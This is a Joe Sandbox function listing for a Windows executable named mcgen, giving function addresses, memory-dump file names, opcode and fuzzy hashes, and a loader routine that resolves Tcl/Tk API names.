Function 00007FF6B9F334F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6B9F334F4

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction ID: ca7ff017ef88c378af58a7a6aba236e31548d94d091e8550658fce5748e0360a
Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction Fuzzy Hash: 26B09B10E07A01C2E9051F396C8211412587F44752F544134C60C81730DD2C30E55701

Function 00007FF6B9F23610 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction ID: d04358492fded295999bb139a7e4c71d2b6217695dcf1dd9cf7f0a0073550c83
Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction Fuzzy Hash: 27D1F2A2A0C68287EB288E2D805077DB7A9EB05F69F144235EF1D87794DFBDE855C700

Function 00007FF6B9F19870 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction ID: bf2b9d6d4c79dbc5f5487ee65d0c29a74f7753ceee18868f2f42664fb6707261
Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction Fuzzy Hash: F6C1AE762181F08BD289EB29E46947A73D1F78A30EB95406BEF87477C6CB3CA414DB50

Function 00007FF6B9F22C80 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction ID: c9391c5a5f806ab3d82a9032e5999d242345105e4dae8c5d1c8bb7441ce359fc
Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction Fuzzy Hash: 34B17C72A18BC589EB688F2DC0502BC3BA8E749B69F680135EB4E87395CF39D451D740

Function 00007FF6B9F2E5E0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction ID: a92ba5a7b1a5f0d9400ab63b76fd4fef7eb67b7a58256c59a49cb94d946a02e5
Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction Fuzzy Hash: C081D272A187C146E774CF1EA4443BA7E96FB457A5F244235EB9D87B99DE3CE4008B00

Function 00007FF6B9F36488 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
Instruction ID: d0bc1e67966e37b1ddf7db76d8f5f72e34d623b886df4089e54c7266412d8172
Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
Instruction Fuzzy Hash: 6861FD32E1C19246FB748EBC845A37D6688AF417B6F154239DB1DCBAD5DE7DE8008702

Function 00007FF6B9F219B4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: b4e6e4ab18793597b31e0b07c740e783db9605c492d5674f8b91e41d3a8bdfc3
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 15515076B1869186E7248F2DC04033933A4EB55B79F248131EB4D97795DF3AE853CB44

Function 00007FF6B9F221D4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 5f7b4dea56d64911ffc821fd3cfccdd9825eceb7659d8dbfc9d18007b81c421a
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 3A514C76A1869186E7688F2DC0403B837A8EB55B79F244231EF8D977D4CF3AE852C740

Function 00007FF6B9F21DC4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 5112f222acc4ae101a95773383e0a5d421c4c0326403c907949fbd033696eb33
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: F5516376B28A9286E7248F2DD45032833A4EB44B79F248131EB4D8B794CF3AF852C744

Function 00007FF6B9F21BC0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 653ca95172c883ff5166f8825cd640d38ef3f6379314b18f19adeec4835cf434
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: FF51A276B1869586E7248F2DC08037837A9EB45B69F648131EF4C97798CF3AE843C744

Function 00007FF6B9F217B0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: deaa3f76c4fb510c0af04608f87be0ad85197d98b1dd63ff1c1793a04ab3eab1
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 3B518F36B1869186E7248F2DD08037C37A9EB44B69F249131EF4D97798CF3AE852C784

Function 00007FF6B9F21FD0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 05797660e000809b362841b0a2a6fde8534fcc1450c7c01452cfdfde6369a969
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: EF517136A1869186EB28CF2DC4407BD37A4EB58B69F244131EB4D977A4CF3AEC42C740

Function 00007FF6B9F25DA0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 6905d5b884b6ba48e2e90c1d0ec5f617480c3707c7c425a4ea32d8c5c147a7a6
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 9A41B7B2C19BCA54EB658D2C09147B876889F62BB2D5852B0FF99DB3C3DD2C29878101

Function 00007FF6B9F29F10 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction ID: 054cb1c613dda13c99a8d71afe107cac4011e474602f65d708d7f01266fc2a64
Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction Fuzzy Hash: 4D41F622714A9582EF04CF6EDA24269B3A5FB48FE0B499436EF0DD7B59DE3CD5418300

Function 00007FF6B9F28154 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: 0e3bb9eccb50f775f36c0acec917732770a32bcfef259014a5af0b91a7e76bbd
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: 42318432B1DB8282E7649F29A84027E7699AB85BE1F144239FB5D93BD5DF3CD0118704

Function 00007FF6B9F395E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction ID: 4d7594d7a713ae1406f063b44eb4da79171a862608b0ea43b618587a1fcb44a8
Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction Fuzzy Hash: 5DF04F71B182968BDBA88F6DA80262977D4FB083D5F80C039E789C3A14DE7C90618F04

Function 00007FF6B9F1D37C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction ID: bfca61075236917839c8c8ff3014cc055ab4e848f2eeb1e213f26fe47296abad
Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction Fuzzy Hash: 02A0016190C82AD0E6598F29A8A01356338BB51366B400131E20D820A09F6CA4009251

Function 00007FF6B9F176B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6B9F176C7
GetLastError.KERNEL32 ref: 00007FF6B9F176D9
GetProcAddress.KERNEL32 ref: 00007FF6B9F17715
GetLastError.KERNEL32 ref: 00007FF6B9F17727
GetProcAddress.KERNEL32 ref: 00007FF6B9F17740
GetLastError.KERNEL32 ref: 00007FF6B9F17752
GetProcAddress.KERNEL32 ref: 00007FF6B9F1776B
GetLastError.KERNEL32 ref: 00007FF6B9F1777D
GetProcAddress.KERNEL32 ref: 00007FF6B9F17799
GetLastError.KERNEL32 ref: 00007FF6B9F177AB
GetProcAddress.KERNEL32 ref: 00007FF6B9F177C7
GetLastError.KERNEL32 ref: 00007FF6B9F177D9
GetProcAddress.KERNEL32 ref: 00007FF6B9F177F5
GetLastError.KERNEL32 ref: 00007FF6B9F17807
GetProcAddress.KERNEL32 ref: 00007FF6B9F17823
GetLastError.KERNEL32 ref: 00007FF6B9F17835
GetProcAddress.KERNEL32 ref: 00007FF6B9F17851
GetLastError.KERNEL32 ref: 00007FF6B9F17863

Strings

Tcl_DeleteInterp, xrefs: 00007FF6B9F177EB, 00007FF6B9F1780D
Tcl_GetCurrentThread, xrefs: 00007FF6B9F17847, 00007FF6B9F17869
Tk_GetNumMainWindows, xrefs: 00007FF6B9F17C97, 00007FF6B9F17CB9
Tcl_NewByteArrayObj, xrefs: 00007FF6B9F17AF9, 00007FF6B9F17B1B
Tcl_Alloc, xrefs: 00007FF6B9F17C0D, 00007FF6B9F17C2F
Tcl_MutexUnlock, xrefs: 00007FF6B9F178D1, 00007FF6B9F178F3
Tcl_ConditionNotify, xrefs: 00007FF6B9F1795B, 00007FF6B9F1797D
Tcl_ThreadAlert, xrefs: 00007FF6B9F179E5, 00007FF6B9F17A07
Tk_Init, xrefs: 00007FF6B9F17C69, 00007FF6B9F17C8B
Tcl_CreateInterp, xrefs: 00007FF6B9F1770B, 00007FF6B9F1772D
Tcl_EvalEx, xrefs: 00007FF6B9F17BB1, 00007FF6B9F17BD3
Tcl_Finalize, xrefs: 00007FF6B9F1778F, 00007FF6B9F177B1
Failed to get address for %hs, xrefs: 00007FF6B9F176E8
Tcl_SetVar2Ex, xrefs: 00007FF6B9F17B27, 00007FF6B9F17B49
Tcl_ConditionFinalize, xrefs: 00007FF6B9F1792D, 00007FF6B9F1794F
Tcl_EvalFile, xrefs: 00007FF6B9F17B83, 00007FF6B9F17BA5
Tcl_MutexFinalize, xrefs: 00007FF6B9F178FF, 00007FF6B9F17921
Tcl_CreateObjCommand, xrefs: 00007FF6B9F17A6F, 00007FF6B9F17A91
Tcl_GetString, xrefs: 00007FF6B9F17A9D, 00007FF6B9F17ABF
Tcl_SetVar2, xrefs: 00007FF6B9F17A41, 00007FF6B9F17A63
Tcl_FinalizeThread, xrefs: 00007FF6B9F177BD, 00007FF6B9F177DF
Tcl_CreateThread, xrefs: 00007FF6B9F17819, 00007FF6B9F1783B
Tcl_GetObjResult, xrefs: 00007FF6B9F17B55, 00007FF6B9F17B77
Tcl_ThreadQueueEvent, xrefs: 00007FF6B9F179B7, 00007FF6B9F179D9
Tcl_Init, xrefs: 00007FF6B9F176C0, 00007FF6B9F176DF
GetProcAddress, xrefs: 00007FF6B9F176EF
Tcl_FindExecutable, xrefs: 00007FF6B9F17736, 00007FF6B9F17758
Tcl_GetVar2, xrefs: 00007FF6B9F17A13, 00007FF6B9F17A35
Tcl_EvalObjv, xrefs: 00007FF6B9F17BDF, 00007FF6B9F17C01
Tcl_DoOneEvent, xrefs: 00007FF6B9F17761, 00007FF6B9F17783
Tcl_NewStringObj, xrefs: 00007FF6B9F17ACB, 00007FF6B9F17AED
Tcl_JoinThread, xrefs: 00007FF6B9F17875, 00007FF6B9F17897
Tcl_ConditionWait, xrefs: 00007FF6B9F17989, 00007FF6B9F179AB
Tcl_Free, xrefs: 00007FF6B9F17C3B, 00007FF6B9F17C5D
Tcl_MutexLock, xrefs: 00007FF6B9F178A3, 00007FF6B9F178C5

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 0c87f224aa3ae58cc8d5940a75d2a47234425edf6301dcbc82771e783c497552
